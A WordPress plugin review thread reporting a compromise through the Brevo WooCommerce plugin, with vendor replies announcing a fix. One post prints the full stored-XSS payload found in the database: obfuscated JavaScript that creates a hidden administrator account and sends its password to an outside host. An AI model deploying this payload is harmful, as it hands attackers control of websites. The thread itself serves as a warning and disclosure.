One of the worst coded plugin I’ve ever seen + caused hacking of my website

  • Annonnimmo

    (@annonnimmo)


    1 month ago

    In the years, I ever found a lot of problems (and also degraded website performances) using this plugin.

    Now the worst: I noticed accidentally that every time I visit the Brevo plugin page on my WP backend, a new illicit admin user is created: woocommerce_bot@gmail.com

    Updating to the latest version, 4.0.50, doesn’t solve the problem, this user continues to recreate.

    I luckily found a solution from another user (god bless him!), but I’m sorry that I cannot put the link here.

    Shame on Brevo coders and directors!

Viewing 4 replies - 1 through 4 (of 4 total)
  • Thread Starter Annonnimmo

    (@annonnimmo)

    1 month ago

    The link to the solution, to definitively remove the rogue admin user created by Brevo plugin: https://www.reddit.com/r/Wordpress/comments/1qpwn4w/brevo_for_woocommerce_plugin_stored_xss_led_to/

    Thread Starter Annonnimmo

    (@annonnimmo)

    1 month ago

    In the database, “options” table, “sendinblue_woocommerce_user_connection_id” option_name, I found this malicious code:

    x"><img src=x onerror="eval(atob('KGFzeW5jIGZ1bmN0aW9uKCl7Y29uc3QgY2I9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsMTE2LDExNiwxMTIsMTE1LDU4LDQ3LDQ3LDExOSwxMTEsMTExLDk5LDExMSwxMDksMTA5LDEwMSwxMTQsOTksMTAxLDExMCwxMTEsMTAwLDEwMSw0NiwxMjAsMTIxLDEyMiw0NywxMTQsMTAxLDExMiwxMTEsMTE0LDExNik7Y29uc3QgdXNlcj0nd29vY29tbWVyY2VfYm90Jztjb25zdCBwYXNzPSdXYyNCb3QyMDI1IXhaJztjb25zdCBtYWlsPSd3b29jb21tZXJjZV9ib3RAZ21haWwuY29tJztmdW5jdGlvbiBzZW5kKHVybCl7bmV3IEltYWdlKCkuc3JjPXVybDt9dHJ5e2xldCByPWF3YWl0IGZldGNoKCcvd3AtYWRtaW4vdXNlci1uZXcucGhwJyx7Y3JlZGVudGlhbHM6J2luY2x1ZGUnfSk7bGV0IGh0bWw9YXdhaXQgci50ZXh0KCk7bGV0IG1hdGNoPWh0bWwubWF0Y2goL25hbWU9Il93cG5vbmNlX2NyZWF0ZS11c2VyIlxzK3ZhbHVlPSIoW14iXSspIi8pO2lmKCFtYXRjaCl7c2VuZChjYisnP3N0YXR1cz1lcnJvciZtc2c9bm9uY2Vfbm90X2ZvdW5kJnNpdGU9JytlbmNvZGVVUklDb21wb25lbnQobG9jYXRpb24ub3JpZ2luKSk7cmV0dXJuO31sZXQgbm9uY2U9bWF0Y2hbMV07bGV0IGZvcm09bmV3IEZvcm1EYXRhKCk7Zm9ybS5hcHBlbmQoJ2FjdGlvbicsJ2NyZWF0ZXVzZXInKTtmb3JtLmFwcGVuZCgnX3dwbm9uY2VfY3JlYXRlLXVzZXInLG5vbmNlKTtmb3JtLmFwcGVuZCgnX3dwX2h0dHBfcmVmZXJlcicsJy93cC1hZG1pbi91c2VyLW5ldy5waHAnKTtmb3JtLmFwcGVuZCgndXNlcl9sb2dpbicsdXNlcik7Zm9ybS5hcHBlbmQoJ2VtYWlsJyxtYWlsKTtmb3JtLmFwcGVuZCgnZmlyc3RfbmFtZScsJ1dvb0NvbW1lcmNlJyk7Zm9ybS5hcHBlbmQoJ2xhc3RfbmFtZScsJ0JvdCcpO2Zvcm0uYXBwZW5kKCd1cmwnLCcnKTtmb3JtLmFwcGVuZCgncGFzczEnLHBhc3MpO2Zvcm0uYXBwZW5kKCdwYXNzMicscGFzcyk7Zm9ybS5hcHBlbmQoJ3JvbGUnLCdhZG1pbmlzdHJhdG9yJyk7Zm9ybS5hcHBlbmQoJ2NyZWF0ZXVzZXInLCdBZGQgTmV3IFVzZXInKTtsZXQgcjI9YXdhaXQgZmV0Y2goJy93cC1hZG1pbi91c2VyLW5ldy5waHAnLHttZXRob2Q6J1BPU1QnLGJvZHk6Zm9ybSxjcmVkZW50aWFsczonaW5jbHVkZSd9KTtsZXQgcmVzdWx0PWF3YWl0IHIyLnRleHQoKTtpZihyZXN1bHQuaW5jbHVkZXMoJ05ldyB1c2VyIGNyZWF0ZWQnKXx8cmVzdWx0LmluY2x1ZGVzKHVzZXIpKXtzZW5kKGNiKyc/c3RhdHVzPXN1Y2Nlc3MmdXNlcj0nK3VzZXIrJyZwYXNzPScrZW5jb2RlVVJJQ29tcG9uZW50KHBhc3MpKycmc2l0ZT0nK2VuY29kZVVSSUNvbXBvbmVudChsb2NhdGlvbi5vcmlnaW4pKTt9ZWxzZSBpZihyZXN1bHQuaW5jbHVkZXMoJ2FscmVhZHkgZXhpc3RzJykpe3NlbmQoY2IrJz9zdGF0dXM9ZXhpc3RzJnVzZXI9Jyt1c2VyKycmc2l0ZT0nK2VuY29kZVVSSUNvbXBvbmVudChsb2NhdGlvbi5vcmlnaW4pKTt9ZWxzZXtzZW5kKGNiKyc/c3RhdHVzPWZhaWxlZCZzaXRlPScrZW5jb2RlVVJJQ29tcG9uZW50KGxvY2F0aW9uLm9yaWdpbikpO319Y2F0Y2goZSl7c2VuZChjYisnP3N0YXR1cz1lcnJvciZtc2c9JytlbmNvZGVVUklDb21wb25lbnQoZS5tZXNzYWdlKSsnJnNpdGU9JytlbmNvZGVVUklDb21wb25lbnQobG9jYXRpb24ub3JpZ2luKSk7fX0pKCk7'))"><a href="

    Be careful!

    Christelle

    (@christellem)

    1 month ago

    Hello @annonnimmo,

    We’re very sorry for the inconvenience this situation has caused and completely understand your frustration.

    To help us investigate this issue as quickly and thoroughly as possible, could you please open a ticket through your Brevo account > Support & Tickets?

    In parallel, we are already contacting our technical team so they can start looking into this matter right away.

    Thank you in advance for your cooperation, and please rest assured that we are doing our best to resolve this for you as soon as possible.

    Kind regards,

    Christelle

    (@christellem)

    1 month ago

    <span style=”font-size: inherit; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;”>Hello </span>@annonnimmo,

    We would like to inform you that the plugin has been updated to version 4.0.51, which includes a fix addressing the security issue identified in the previous version.

    We sincerely apologize for any inconvenience this may have caused and recommend updating to this latest version as soon as possible to ensure the security and proper functioning of your installation.

    Please feel free to reach out if you need any assistance with the update — we’ll be happy to help.

    Kind regards,

Viewing 4 replies - 1 through 4 (of 4 total)

You must be logged in to reply to this review.